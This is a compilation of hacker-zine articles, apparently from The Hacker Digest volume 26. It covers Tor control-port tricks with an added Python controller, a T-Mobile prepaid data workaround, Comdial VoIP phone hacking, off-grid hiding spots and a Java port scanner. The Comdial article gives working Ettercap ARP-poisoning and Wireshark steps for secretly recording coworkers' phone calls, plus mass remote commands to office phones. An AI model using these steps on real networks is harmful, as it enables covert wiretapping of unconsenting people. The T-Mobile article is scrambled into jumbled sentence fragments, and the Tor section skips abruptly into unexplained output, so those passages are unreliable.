Note: Vidalia enables the control port with a password; you will need to look up that password or avoid using Vidalia to start Tor. Keep in mind that a control port with no password is only as private as 127.0.0.1:9051 itself: any local process that can connect to it gets everything shown in this guide, including the ability to read and rewrite your Tor configuration, so on a shared machine set HashedControlPassword or CookieAuthentication in torrc rather than leaving it open.

1.1 Tor control commands

We can now control the Tor client's operation by issuing a number of commands. This is a bit boring, but you will need to learn some of the more important commands before you can start messing with Tor.

1.1.1 Viewing and setting configuration variables

You can view and set Tor configuration variables to change Tor's operation. Most of these variables are set in the torrc file, but you can override them dynamically as you see fit. Play with these commands to learn more about Tor's configuration.

getconf - gets a value stored in a configuration variable.

getconf controlport
250 ControlPort=9051

setconf - sets configuration variables. For the most part these variables can be set inside torrc; there are several variables (e.g. __DisablePredictedCircuits) which can only be set through the Tor control interface.

setconf controlport=9051
250 OK

saveconf - saves current configuration values to the torrc file. Values such as __DisablePredictedCircuits will not be saved.

For a complete listing of configuration variables that you can view or set, issue the following command:

getinfo config/names

1.1.2 Viewing what Tor is doing

Tor has a highly customizable logging system which allows us to see exactly what it is doing in the background. Before any information will be displayed, we must tell Tor exactly what we want to see using the "setevents" command. "setevents" enables console log output of predefined event types. Valid event types include:

• CIRC - circuit events. Includes information on newly created, already existing, and closed circuits.
• STREAM - stream events. Provides information on the status of application streams, including which circuit is used for the connection.
• ORCONN - Tor network connection events. These events display newly established and closed connections to Tor nodes.
• BW - bandwidth in the last second. If you enable this event, it will produce output every second, even if there is no activity.
• STREAM_BW - bandwidth used by individual streams. Unlike BW, STREAM_BW displays data only when there is activity.
• DEBUG, INFO, NOTICE, WARN, ERR - informational messages of varying severity.
• ADDRMAP - address mapping events. These events show domain-to-IP mappings that are cached by the Tor client.
• NEWDESC, AUTHDIR_NEWDESCS, DESCCHANGED - dirserver events.
• STATUS_GENERAL, STATUS_CLIENT, STATUS_SERVER - status information.
• GUARD - guard node events.
• NS - network status events.

For a complete listing of event types that you can enable, use the following command:

getinfo events/names

So, in order to enable console output of event types circ (circuit events), issue the following command:

setevents circ

Multiple events can be specified at the same time:

setevents circ stream orconn

Prepend the keyword "EXTENDED" to see extended event information where available:

setevents extended circ

Note: Every time you issue a setevents command, all displayed event types will be reset.

I personally find the following set of events most informative:

setevents extended circ stream orconn addrmap status_general status_client guard

1.1.3 Querying Tor for runtime information

Tor has a large number of runtime variables that it needs to keep track of in order to successfully build circuits. We can query this information using the "getinfo" command.

Get information on currently open circuits:

getinfo circuit-status
250+circuit-status=
4 BUILT Xaishacha,croeso
3 BUILT blutroth,sabotage
2 BUILT blutroth,$9E9FAD3187C9911B71849E0E63F35C7CD41FAAA3
1 BUILT blutroth,$E56FEABE3E7D822931F768A7A0F18E7BEA901EBD
.
250 OK

Get information about currently open streams:

getinfo stream-status
250+stream-status=
4 SUCCEEDED 2 74.125.39.147:80
3 SUCCEEDED 2 74.125.39.147:80
2 SUCCEEDED 2 74.125.39.147:80
.
250 OK

For a complete listing of information types that you can view, issue the following command:

getinfo info/names

2. Creating Custom Circuits

Now that you know how to configure Tor, we are ready for some fun. First, you will need to change some configs to disable circuit autocreation and allow us to create and destroy all circuits manually:

setconf __DisablePredictedCircuits=1
(disable preemptively creating circuits)
setconf MaxOnionsPending=0
(maximum circuits pending)
setconf newcircuitperiod=999999999
(longer period before creating new circuit)
setconf maxcircuitdirtiness=999999999
(longer period for circuit expiration)

Let's delete already created circuits so that they don't interfere with us:

closecircuit 2
250 OK
closecircuit 1
250 OK
getinfo circuit-status
250-circuit-status=
250 OK

In case you don't see expected output, enable appropriate event output using the "setevents" command.

2.1 Creating five or more-hop circuits

How about creating a five-hop circuit for privacy overkill? This does not really increase your anonymity, but it is still awesome to send your packets flying around the world. Use the "extendcircuit" command to create, or extend, circuits. Immediately following "extendcircuit" is the circuit id. 0 means create a new circuit. Any other number will extend an already existing circuit with the supplied circuit id.

extendcircuit 0 blutroth,sabotage
250 EXTENDED 5
getinfo circuit-status
250-circuit-status=5 EXTENDED blutroth,sabotage
250 OK
extendcircuit 5 croeso
250 EXTENDED 5
getinfo circuit-status
250-circuit-status=5 BUILT blutroth,sabotage,croeso
250 OK
extendcircuit 5 TorMiddleMan391,chaoscomputerclub23
250 EXTENDED 5
getinfo circuit-status
250-circuit-status=5 EXTENDED blutroth,sabotage,croeso,TorMiddleMan391,chaoscomputerclub23
250 OK

Let's go insane with a ten-hop circuit. To build a circuit of this size, we will need to increase the circuit build timeout:

setconf circuitbuildtimeout=300
250 OK
extendcircuit 0 blutroth,Xaishacha,Tonga,bettyboop,optipiii866,Bellum,poolTOR,TorMiddleMan391,aim1loxal1net,chaoscomputerclub23
250 EXTENDED 18
650 CIRC 18 LAUNCHED
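Typing the section 2 recipe into telnet is fine once; a controller program has to do what the telnet session hides from you: split replies on the three-digit code and the separator that follows it ("-" means more lines follow, "+" opens a data block that ends with a lone "." line, a space marks the last line), and cope with 650 event lines that Tor may deliver in the middle of waiting for a reply, as happens in the attachstream transcript in section 3. The following is an added example written for this article, not the TorCtl library and not code from the article itself. It builds a custom circuit the way section 2 does (disable predicted circuits, close what exists, EXTENDCIRCUIT 0 with the full path, then wait for the CIRC ... BUILT event). The scripted control port at the bottom is a constructed stand-in whose replies are shaped like the article's transcript, so the flow runs without a Tor daemon; against a live Tor you pass it a socket file instead.

```python
"""Minimal Tor control-port client for building a circuit by hand (added example)."""


class TorControl:
    """Tor control protocol (control-spec.txt) over objects with readline()/write()/flush()."""
    def __init__(self, rfile, wfile):
        self.rfile, self.wfile, self.pending = rfile, wfile, []   # pending: stashed 650 events
    def _readline(self):
        raw = self.rfile.readline()
        if not raw:
            raise RuntimeError("control port closed")
        return raw.decode("ascii", "replace").rstrip("\r\n")
    def _read_reply(self):
        """One reply or event as (code, lines): '-' continues, '+' opens a data block, ' ' ends."""
        lines = []
        while True:
            line = self._readline()
            code, sep, text = line[:3], line[3:4], line[4:]
            lines.append(text)
            if sep == "+":                              # data lines until a lone '.'; '..' escapes
                data = self._readline()
                while data != ".":
                    lines.append(data[1:] if data.startswith("..") else data)
                    data = self._readline()
            elif sep == " ":
                return code, lines
    def command(self, cmd):
        self.wfile.write((cmd + "\r\n").encode("ascii"))
        self.wfile.flush()
        code, lines = self._read_reply()
        while code == "650":                            # event arrived before our reply; keep it
            self.pending.append(lines[0])
            code, lines = self._read_reply()
        if not code.startswith("2"):
            raise RuntimeError("%s -> %s %s" % (cmd, code, lines[0]))
        return lines
    def next_event(self):
        while not self.pending:
            code, lines = self._read_reply()
            if code != "650":
                raise RuntimeError("expected an event, got %s" % code)
            self.pending.append(lines[0])
        return self.pending.pop(0)
    def authenticate(self, password=""):
        self.command('AUTHENTICATE "%s"' % password.replace("\\", "\\\\").replace('"', '\\"'))
    def getinfo(self, key):
        lines = self.command("GETINFO " + key)          # "key=value" then "OK", or key= + data block
        inline = lines[0][len(key) + 1:]
        return [inline] if inline else lines[1:-1]
    def extendcircuit(self, circ_id, path):
        """0 creates a new circuit, any other id extends it; returns the id from '250 EXTENDED n'."""
        return int(self.command("EXTENDCIRCUIT %d %s" % (circ_id, ",".join(path)))[0].split()[1])
    def wait_for_circuit(self, circ_id, status="BUILT"):
        """Consume CIRC events until circuit circ_id reaches status; returns its path."""
        while True:
            ev = self.next_event().split()
            if ev[0] == "CIRC" and int(ev[1]) == circ_id:
                if ev[2] == status:
                    return ev[3].split(",") if len(ev) > 3 else []
                if ev[2] in ("FAILED", "CLOSED"):
                    raise RuntimeError(" ".join(ev))


def build_custom_circuit(ctl, path):
    """Section 2 by hand: no predicted circuits, close what exists, build `path`, await BUILT."""
    ctl.command("SETCONF __DisablePredictedCircuits=1")
    for line in ctl.getinfo("circuit-status"):         # one 'CircuitID Status Path' line each
        ctl.command("CLOSECIRCUIT %s" % line.split()[0])
    ctl.command("SETEVENTS CIRC")
    circ_id = ctl.extendcircuit(0, path)
    return circ_id, ctl.wait_for_circuit(circ_id)


class ScriptedControlPort:
    """Constructed stand-in for a Tor control port: canned replies, one list per command."""
    def __init__(self, script):
        self.script, self.sent, self.buf = {k: list(v) for k, v in script.items()}, [], b""
    def write(self, data):
        self.sent.append(data.decode("ascii").rstrip("\r\n"))
    def flush(self):
        self.buf += self.script[self.sent[-1]].pop(0)  # KeyError/IndexError: unscripted command
    def readline(self):
        end = self.buf.find(b"\n") + 1 or len(self.buf)
        line, self.buf = self.buf[:end], self.buf[end:]
        return line


SAMPLE_SCRIPT = {   # constructed, shaped like the article's transcript; not a real Tor session
    'AUTHENTICATE ""': [b"250 OK\r\n"],
    "SETCONF __DisablePredictedCircuits=1": [b"250 OK\r\n"],
    "GETINFO circuit-status": [b"250+circuit-status=\r\n2 BUILT blutroth,sabotage\r\n"
                               b"1 BUILT Xaishacha,croeso\r\n.\r\n250 OK\r\n"],
    "CLOSECIRCUIT 2": [b"250 OK\r\n"], "CLOSECIRCUIT 1": [b"250 OK\r\n"],
    "SETEVENTS CIRC": [b"250 OK\r\n"],
    "EXTENDCIRCUIT 0 blutroth,sabotage,croeso": [
        b"250 EXTENDED 5\r\n650 CIRC 5 LAUNCHED\r\n650 CIRC 5 EXTENDED blutroth\r\n"
        b"650 CIRC 5 EXTENDED blutroth,sabotage\r\n650 CIRC 5 BUILT blutroth,sabotage,croeso\r\n"],
}


def demo():
    port = ScriptedControlPort(SAMPLE_SCRIPT)           # live Tor: f = socket.create_connection(
    ctl = TorControl(port, port)                        #   ("127.0.0.1", 9051)).makefile("rwb")
    ctl.authenticate("")
    circ_id, hops = build_custom_circuit(ctl, ["blutroth", "sabotage", "croeso"])
    return circ_id, hops, port.sent
```

The one design point worth copying is that command() never assumes the next line is its own reply: events are stashed and handed out by next_event(), so a stream or circuit event arriving between the EXTENDCIRCUIT and its 250 is not lost or mistaken for the answer. Real Tor paths in CIRC events carry fingerprints and nicknames ($fp~nick) on newer versions; the split(",") above keeps whatever form the daemon sends.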

650 CIRC 17 EXTENDED sabotage
650 CIRC 17 EXTENDED sabotage,chaoscomputerclub23
650 CIRC 17 EXTENDED sabotage,chaoscomputerclub23,SEC
650 CIRC 17 EXTENDED sabotage,chaoscomputerclub23,SEC,desync
650 CIRC 17 BUILT sabotage,chaoscomputerclub23,SEC,desync
650 STREAM 11 NEW 0 whatismyip.org:80 SOURCE_ADDR=127.0.0.1:45597 PURPOSE=USER
attachstream 11 17 HOP=3
650 STREAM 11 REMAP 0 206.176.224.3:80 SOURCE=CACHE
650 STREAM 11 SENTCONNECT 17 206.176.224.3:80
250 OK
650 STREAM 11 REMAP 17 206.176.224.3:80 SOURCE=EXIT
650 STREAM 11 SUCCEEDED 17 206.176.224.3:80
650 STREAM 11 CLOSED 17 206.176.224.3:80 REASON=DONE

The IP address returned by whatismyip.org is 81.169.137.209 (tor.ephemer.de), which corresponds to the chaoscomputerclub23 exit node.

Hint: attach a stream to circuit 0 to let the Tor client assign it automatically.

4. Other tricks

Below are a few more random tricks.

Get the country code for an IP address:

getinfo ip-to-country/216.66.24.2
250-ip-to-country/216.66.24.2=us
250 OK

Resolve domains and IP addresses using Tor:

setevents addrmap
250 OK
resolve 2600.com
250 OK
650 ADDRMAP 2600.com 216.66.24.2 "2008-10-11 05:07:45" EXPIRES="2008-10-11 12:07:45"
resolve mode=reverse 216.66.24.2
250 OK
650 ADDRMAP REVERSE[216.66.24.2] phalse.2600.COM "2008-10-11 05:09:10" EXPIRES="2008-10-11 12:09:10"

Switch to new circuits:

signal newnym

Reduce Tor traffic by disabling preemptive circuit creation:

setconf __DisablePredictedCircuits=1

Speed up Tor:

setconf CircuitBuildTimeout=10

Use a specific exit node for a website:

mapaddress www.2600.com=www.2600.com.chaoscomputerclub23.exit

Let's redirect all CNN traffic to BBC :)

mapaddress www.cnn.com=www.bbc.co.uk

5. Automation

I have developed a Python script to automate circuit creation using the TorCtl library. Using this script, you will be able to specify which countries you want to use for each hop, specify circuit sizes, how many ocean and continent crossings you want to take, and many other tweaks. You can get it here: http://thesprawl.org/code/src/tor-autocircuit.tar.bz2

Also, for a quick listing of Tor exit nodes to use in your custom circuits, use another script I wrote to query the exit node directory listing: http://thesprawl.org/code/src/tor-nodes.py

Conclusion

There was a lot of ground covered in this guide, but there are even more interesting hacks still out there, waiting to be discovered. So go ahead and have some fun! Here are a few links to get you started:

• http://www.torproject.org/svn/trunk/doc/spec/control-spec.txt
• https://svn.torproject.org/svn/torctl/trunk/doc/howto.txt

Root teh moon! Greetz to all mrlers, good folks from trin, and leet dudez of sf2600.

I worked around using Google Calendar and the very cool GVENT (48368) SMS on-the-fly event creation function. you get a fairly full page of options. Some other sites that do not appear on the T-Zones menus but are accessible by URL entry include: mobi. Syn Ack (757). There are some even faster work-arounds that can be manipulated by use of the oneSearch function.m. If you enter “wiki” and your search term in the search box.amazon. JaR_ G0ats. not so much.VOLUME 26
Hack T-Mobile Prepaid Messaging and T-Zones
by Mr. And now that I have access to a regular mobile inbox. ➥com/. Even the heavily-castrated (but. though not referenced anywhere in the T-Zones menus. So then you’ll see that if you point the WAP browser to the URL http://us. 4INFO (wap. right? No. “amusing info. However.net. What the phone lacked in PDA function. sports. As you can probably imagine.traffic. T-Mobile’s prepaid per-message charges do not apply here.com/gp/aw).” etc. but they get the job done and don’t cost a penny. Again. by extension I also have access to essentially the full internet. The steps involved are not always time-effective. Bookmark this page. The free “T-Zones” web access provides direct links to only a few sites (news. I can do this by use of web-by-email services such as www@web2mail. will be able to provide me free web access for life. I found myself burning through more nickels and dimes (literally) than my stinginess could handle. there is a search box. which I could couple with home and work PCs without ever having to physically sync.
177
.. and are perhaps best personified by my mobile f0ne: a vanilla..” So T-Mobile keeps their prepaid customers on a pretty strict data diet.).4info. First of all. a mirrored Wikipedia entry for your search term (retrieved from a still-accessible Yahoo domain) can be received. none of these methods or WAP sites are particularly suave. The compromises to which they usually come leave them both wanting. So go ahead and send and receive messages with wild abandon.net). is not part of T-Mobile’s DNS blacklist (probably because many of the handsets include a podunk Yahoo IM client). now we know that Yahoo! Mobile. you can work outside the margins that T-Mobile has established for its prepaid customers. Curious / DoPi
I am an unrepentant cheapskate and also an information junkie. between the sending and receiving of several SMS reminders (as well as the occassional Twitter or regular SMS messages). these two aspects of my personality are constantly at war with one another–the latter always wanting more and fresher data. which will pull the current page and send it to your Yahoo! Mobile inbox. radar. but they do provide some options to soup-up your prepaid plan at no cost. there have been a few times that I’ve needed fairly “normal” web access–to win a bet. HoFo.yahoo. the former usually unwilling to foot the bill. By utilizing the steps below. Shout-outs: Bobakko & Benji. all importantly. Furthermore.triese ➥.it (enter target URL in body). At this point I went ahead and stopped my SMS Twitter alerts and pointed them instead to my Yahoo! inbox–ditto with SMS event reminders from my Google Calendar account (which I retained because it is superior in all respects to Yahoo!’s). I’ll always retain my trusty T-Mobile prepaid (with a couple bucks balance to keep it alive). you can see that one of the options there is Yahoo! Mail–and bear in mind that we are still in the FREE area of T-Zones.com (enter target URL in subject) or www4mail@wm. FREE) “T-Zones” function has worked fairly well and provided data snippets like stock quotes and weather forecasts when I’ve needed them. So. which. and even Amazon (www.ictp. you may notice that at the top of the T-Zones page. it has functioned adequately for what I need: a short voice call or two per day and the occasional SMS. look up a definition.THE HACKER DIGEST . Typing anything in there and clicking “Search” takes you to a Yahoo! Mobile oneSearch results page. in a pinch. and any attempts to enter URLs pointing anywhere outside of this handful of pages would return the always-nasty message: “your plan does not support this feature. Now. For the most part. Even if I ever put my tightwad days behind me and (gasp!) get on a contract plan. 
no-frills “gimme” handheld with T-Mobile prepaid. or what-haveyou. DoPi.com.

Calling Comdial, Part #2
by Metalx1000

Hello all, I've learned some things since my last article on Comdial phones. Comdial was founded in 1977 and went defunct in 2005. Now owned by Vertical Communications, they still make VoIP phones and I've seen the identical models released with a different logo on them. Also, instead of saying Comdial at the top of the phone, they say "Vertical", and the model is now "Edge 300" instead of "CONVERSip EP300". Other than the different logos they seem to be the same phones, so I am confident that these techniques will work on these new phones as well. This time I'm going to show you a little more you can do with port 9027 and then I'll explain how you can use Ettercap to remotely record conversations from most VoIP phones through the local network. But first, here is a quick review and some commands I did not go over last time.

Last time I went over logging into the phone remotely using Netcat on port 9027. Each button on the Comdial phone has an LED light on it. If you send the "L" command to the phone on port 9027, it will make the LEDs all flash in a cool pattern. It's very Christmas-light like. You can connect to the phone with Netcat, the networking swiss army knife, as I showed you last time, and press the "L" key (it is case sensitive) and "ENTER" like so:

/home/user> nc 192.168.22.237 9027
[12:29:21.778] command_poll: got listenfd event
[12:29:21.789] Phone Version : 3.026
[12:29:21.789] Phone MD5Sum : 3777ad4b3ac20ae9b56391267e81bb90
[12:29:21.789] Phone Build Date: 01/16/2009 12:29:21
[12:29:21.790] Connected to station 237
[12:29:21.790] command_poll: action->fd_ptr=9 accepted
[12:29:21.799] Boot Version : 1.04
[12:29:21.800] Boot Build Date : 05/03/2005 22:40:17
[12:29:21.800] Boot MD5Sum : 5b84e34dcf06235e3763c755a9c57e9c
[12:29:23.009] ServiceSubscriptions: Started
[12:29:23.009] ServiceSubscriptions: Ended
L
[12:29:24.218] Test LED enabled:
[12:29:24.229] Use 'u' and 'd' keys to select a cadence, then press an LED
[12:29:24.229] Current cadence: R

To get the phone to stop flashing, just send the "L" command a second time. You can also pipe the command in, connect, and disconnect all in one shot like so:

/home/user> echo L | nc 192.168.22.237 9027 -q1

This sends the "L" key to the phone and the "-q1" is a switch telling Netcat to disconnect after 1 second.

Now let's say you have a bunch of phones that you want to make flash all at once. We can do this with a few simple commands. But first, we need to get a list of all the phones. Let's use Nmap, and save the output to a file like this:

/home/user> nmap 192.168.22.* -p 9027 > comdial.lst

This may take a little while, so be patient. It will create a text file called "comdial.lst" and the contents of that file will look something like this:

Host 192.168.22.230 appears to be up ... good.
Interesting ports on 192.168.22.230:
PORT     STATE  SERVICE
9027/tcp open   unknown
Host 192.168.22.193 appears to be up ... good.
Interesting ports on 192.168.22.193:
PORT     STATE  SERVICE
9027/tcp closed unknown
Host 192.168.22.231 appears to be up ... good.
Interesting ports on 192.168.22.231:
PORT     STATE  SERVICE
9027/tcp open   unknown

The Comdial phones are the addresses with the "9027/tcp open unknown" lines. So, now we need to run a command that will find the "9027/tcp open unknown" lines in our "comdial.lst" file, strip away everything except the IP addresses of the Comdial phones, and then input those addresses into our Netcat command. I've used a combination of "grep", "cut", and "awk" to do this:

/home/user> cat comdial.lst | grep open -B 2 | grep "Inter" | awk '{print $4}' | cut -d\: -f1 | while read ip; do echo L | nc $ip 9027 -q1; echo "$ip...check"; done

So, we "cat" out our list and use "grep" to grab the lines with "open" and the 2 lines before them. Then we use "grep" again to grab the line with "Inter" on it. Then we use "awk" to grab the IP address and "cut" to remove the trailing colon. We then pipe "L" into Netcat for each IP address that we grabbed. The 'echo "$ip...check"' is just a visual output for the user to know how far along in the process they are. I know that's a long line, but it will run through each IP pretty fast and you will have a bunch of flashing lights all over your office. And to stop them, just run it again.

That was fun, but this is where the real fun starts. Let's use "Ettercap" and "Wireshark" to remotely capture voice conversations from the phone. I'm not going to go into detail on how packet capturing works, but I'm going to show you how to use Ettercap to capture the traffic and Wireshark to decode the conversation. You could use Wireshark to do both, but I prefer using Ettercap to capture packets. One reason I prefer Ettercap over Wireshark for capturing is that its command line interface is simple to use and it is easily installed on computers as well as hand-held devices. One such device is the Nokia n800/n810 Internet tablet. I have one of these and it works great with Ettercap, and can fit easily into your pocket. Both Ettercap and Wireshark are free and open source. I'm using a Linux machine, but I believe that they both run on Windows as well. You have to be on the same local network as the VoIP phone to capture packets from it, but that's just how it is. Here is the command you will type for capturing the packets:

/home/user> ettercap -T -Q -M arp:remote -i ath0 /192.168.1.1/ /192.168.1.237/ -w comdial.cap

The "-T" tells Ettercap to run in text mode, instead of GUI mode, and the "-Q" tells it to run in quiet mode. If you don't use the "-Q" switch, it will try to display all the packets captured on the screen. This will bog down your computer and most likely slow down the whole network as well as bump the people on the phones off. The "-i ath0" is your network interface and may change depending on your computer. The "/192.168.1.1/ /192.168.1.237/" tells Ettercap to capture all info between the two IP addresses. One of the IP addresses is the phone and the other is the router it's connected to. So basically, it is capturing all the traffic for that phone. The "-M arp:remote" is what makes that possible from a third machine on a switched network: Ettercap ARP-poisons both the phone and the router so that their traffic is sent through your computer, which is also why a slow machine disturbs the call. If you were to change the targets to "// //" it would try to capture all network traffic for the entire network, which can also be fun to do. Unless you have a very fast computer, this will bring the network to a halt. And finally the "-w comdial.cap" is telling Ettercap to save all packets captured to a file called comdial.cap.

You will need a halfway decent computer and a good connection for this. This is because if your computer runs slowly, the conversation will break up and the people talking will hang up and redial. I'm using my Eeepc 900 by Asus, which has a 900mhz Celeron Mobile processor and 1GB of RAM. Sometimes it works great, sometimes it runs a little slow so, to use this technique reliably, I would suggest something a little faster. So, if you're one of those people, you can do this to phones in your office while
you are at the office. You won’t be able to do it from home or another office location, since you have to be on the same local network, but you will be able to capture any incoming calls to the targeted phone. Once you are done capturing the info you want, press “q” to quit Ettercap. You can also use the good old “Ctrl+C” to quit Ettercap, but this will give you a message that says “User requested a CTRL+C... (deprecated, next time use proper shutdown)”. I have used “Ctrl+C” to quit before, and it didn’t cause any problems, but I would just suggest using “q” since that is the proper way to do it and you never know what might go wrong if you don’t. Now we can open Wireshark to decode and listen to any conversations that may have taken place on the phone while we were capturing. You can either run “wireshark ➥ comdial.cap” at the command line, or open Wireshark and do the regular “File>Open” from the menu. Now that you have the files open, you will see a list of all packets captured. There will be a lot there and you may want to look through it to see if you can find anything interesting. But for now, we’re just going to be listening to voice conversations. Click “Statistics” from the menu bar and go down to “VoIP Calls”. Wireshark will scan through all the packets and find any VoIP calls for you. Select one from the list and then press “Player”. A new window will open. There is a box that says “Jitter Buffer” and it defaults to 50 milliseconds. I’ve changed this number and it didn’t seem to change the audio output at all. So, just press the “Decode” button and, though it may take a few seconds, it will display two audio tracks. At first you might think that these are Left and Right audio channels, but they are not; they are caller and receiver channels. That’s right, both parts of the conversation are recorded to separate files. To play the tracks, check the check box under the audio track or tracks you want to listen to. Then press “Play”. 
You should hear the conversation you recorded. The recording may play back a little slow, but that is normal. Well, this has been part #2 of my Comdial articles. I hope you liked it because I plan on writing another on how to call a Comdial (or any SIP phone) from your computer or handheld device. Thanks to Canola & Gun_Smoke for your help and support.
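The grep/awk/cut pipeline above depends on the "Interesting ports on" line sitting exactly two lines above the "open" line, which breaks as soon as nmap prints a hostname or an extra port row. The following is an added example, not code from the article: it parses the nmap normal-output format the article shows (a per-host "Interesting ports on ..." header followed by "port/proto state service" rows) into a table, picks the hosts with 9027/tcp open, and sends the "L" toggle over a socket with a timeout instead of nc -q1, returning whatever the phone printed. The SAMPLE_SCAN text is a constructed copy of the article's scan output; the "L" behaviour on port 9027 is the one the article describes.

```python
"""Find phones with 9027/tcp open in saved nmap output and toggle their LEDs (added example)."""
import re
import socket

SAMPLE_SCAN = """\
Host 192.168.22.230 appears to be up ... good.
Interesting ports on 192.168.22.230:
PORT     STATE  SERVICE
9027/tcp open   unknown
Host 192.168.22.193 appears to be up ... good.
Interesting ports on 192.168.22.193:
PORT     STATE  SERVICE
9027/tcp closed unknown
Host 192.168.22.231 appears to be up ... good.
Interesting ports on voip-231.example (192.168.22.231):
PORT     STATE  SERVICE
9027/tcp open   unknown
"""   # constructed from the article's output; the third host has a reverse-DNS name

# Both "Interesting ports on 1.2.3.4:" and "Interesting ports on name (1.2.3.4):" forms.
HOST_RE = re.compile(r"^Interesting ports on (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?:")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Return {ip: {port: state}} from nmap normal output (the nmap 4.x layout shown above)."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {})
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current[int(m.group(1))] = m.group(3)
    return hosts


def phones_with_open_port(text, port=9027):
    """IPs whose scan row for `port` says open; closed or filtered rows are ignored."""
    return sorted(ip for ip, ports in parse_nmap(text).items() if ports.get(port) == "open")


def toggle_leds(ip, port=9027, timeout=2.0):
    """Send 'L' (case sensitive) and return the phone's banner lines; a second call stops it."""
    chunks = []
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(b"L\n")
        try:
            while True:                    # read until the phone stops talking (timeout) or closes
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode("ascii", "replace").splitlines()


if __name__ == "__main__":
    for ip in phones_with_open_port(SAMPLE_SCAN):
        print(ip, "...check")             # replace with toggle_leds(ip) on the real network
```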

Underground Physical Network
by MasterChen infoinject@gmail.com

So, you find yourself on the other side of town from your home base and you just wish you had a safe house where you can freshen up before heading to your next big event. Or, what if a psycho ex-girlfriend or stalker knows every place you frequent? Wouldn't a few hiding places work to your advantage? This is exactly what we will be discussing today! Whether escaping from real life for a few seconds, hours, or days at a time, I'm going to illustrate how you can build a relatively underground network of safe houses, physical caches, hideouts, or just secret meeting areas. Now, of course, before we continue, I am not telling anyone to use these techniques to run from the authorities. That's your own mess and business.

Satellite Setup

Imagine your home or place of residence as a command center or home base. All other locations are going to be referred to as satellites. The first thing to be done is to find several locations with the following criteria:

1. Trustworthy: You know the host very well and they would cover for you if needed. Hosts being the owner or manager of each particular location, i.e. friend's house, office, etc.
2. Accessible: Availability of your satellites needs to be no less than 95%. You never know when you are going to need such a facility, especially since most of the time it would be used for emergency or unplanned circumstances.
3. Proximity: Near and far from your normal routine. As an example, I have spots all over the city; a few of which are on The Strip.
4. Quick or camp?: Can the place just be used to drop off excess baggage, or can it be used to camp at for a few days?

Keep these guidelines in mind and you will be well on your way to establishing your underground network.

At the Satellite

Now that we have locations set up and available to us, it's time to make these areas into fully functional facilities. With proper resources, you can stay off the grid for a while and remain comfortable. First, we need to establish the necessities, such as food and restrooms. If your location does not have food in it, make sure it's relatively close to a place with some sort of food supply. Restrooms are a must, unless you have an iron bladder. Next, a change of clothes would be ideal for comfort, or for a new look when leaving the facility. You can come as a business person and leave as a casual civilian or vice versa. Please refer to the Autumn 2008 edition of The Quarterly for my article on six points of disguise, if you need ideas on wardrobe. Your material can be as simple as a backpack of clothes stashed nicely in the facility somewhere to a full blown walk-in closet. After the bare necessities are covered, we can add other features for additional functionality. If it is possible and realistic, Internet access would be great to have at your sites for several reasons that we are all aware of. Make sure your connection is proxied. :-) A few books or a small entertainment system may be in order if you are planning on staying a while. Just keep in mind that portability should be a priority when staying out of sight.

What if the Satellites are Compromised?

There may come a time when someone discovers your clandestine station. What should you do? Is there anything you can do? How exactly do you recover? It is inadvisable to revisit a compromised satellite. Someone crazy could be waiting there for you. This is why all resources, at any location, should be easy to replace and inexpensive. If you must visit a site after someone dangerous knows about it, get there quickly. Take what you need. Destroy what you don't. You won't be able to visit that particular facility for quite some time, if ever again.

Preventing Satellite Compromise

Of course, there are measures you can take to minimize the probability of your underground network being discovered and these steps are very simple. Make sure no one important is watching you as you access these sites. This destroys the entire purpose of being covert. Follow the "need to know basis" policy. No one really needs to know where you are to contact you. Cellphones are a wonderful thing. The hosts of your locations only need to know their specific role in your network. Only your closest loved ones should know exactly where you are. I'm referring to those who would report you missing and put your picture on the 6 o'clock news if you went off the grid without them knowing. Only use your satellites when you need to. Frequent visits can develop a pattern that others can use later for surveillance. Physical caches may be used instead of satellites for quick drop off and pick up of sensitive material.

While Off the Grid

Invisibility is important in times like these, so here are a few things to help you. While out and about, invest in a prepaid cellphone that doesn't require your actual information for service. Always pay in cash, because it does not leave a paper trail. If you have a GPS enabled phone, disable GPS. PO boxes are something you might want to utilize so that no one can pinpoint any place of residence on you.

Conclusion

Remember that in today's age, you are responsible for your own privacy and security. This ideology transcends technology and should really be viewed as a lifestyle. Too much paranoia can make you crazy, but no paranoia can leave you completely exposed to anyone. What's wrong with having a place to escape the real world?

Shoutouts

bgm: Your ability to learn how to break new systems relatively quickly astounds me. sneaksy: You're the best game hacker I know, hands down. heck48: It takes a hacker to understand one sometimes. Thanks for not restricting my exploration when I was younger. JC: What can I say that I haven't already? You inspire me.


THE HACKER DIGEST - VOLUME 26

Understanding Hacking Tools with Socket Programming

by Uriah C.
There are many tools out there for scanning and breaking into remote systems. With tools like Nmap, Metasploit, and ettercap, scanning and exploiting is easier than it used to be. This, combined with many online tutorials, can give anyone the ability to wreak havoc on a system. It can be as easy as doing a scan with Nmap and then using an exploit and payload from Metasploit. Not to mention that the many live GNU/Linux disks containing these tools are just a download away. Don’t get me wrong, I use these tools for testing the security of my network and love the fact that I can do it quickly. But I am more inquisitive than most when it comes to my tools. I want to understand how they work.

The first step in exploiting a remote system is knowing which ports are running a service that can be exploited, so I decided to write a simple port scanner in order to come to an understanding of programming client applications that can be used to find open services. The easiest way to find an open port is to try to connect to that port. If one can connect to the port, then there must be some service running on it. This is not the stealthiest way to scan a system for open ports, though, because the program is connecting to the service and might leave a log that a client tried to connect. Also, if the service is busy and cannot handle the connection, then the scanner will give a false negative. Here is some pseudocode for my application, which was written in Java:

// If socket programming is not built in, then don't forget to import the
// needed libraries.
import java.io.IOException;
import java.net.Socket;

public class PortScan {
    public static void main(String[] args) {
        // We need to identify the target. This can be any IP,
        // but I will use the local address for this example.
        String ipAddress = "127.0.0.1";
        // Now let's try to connect to ports on the IP address with a for loop.
        for (int port = 1; port < 1025; port++) {
            // try-with-resources closes the socket after each attempt
            try (Socket socket = new Socket(ipAddress, port)) {
                // If there is a connection, then it will let us know the port is open.
                System.out.println("port " + port + " on " + ipAddress + " is open");
            } catch (IOException e) {
                // If the connect fails, then the port is closed.
                System.out.println("port " + port + " on " + ipAddress + " is closed");
            }
        }
    }
}

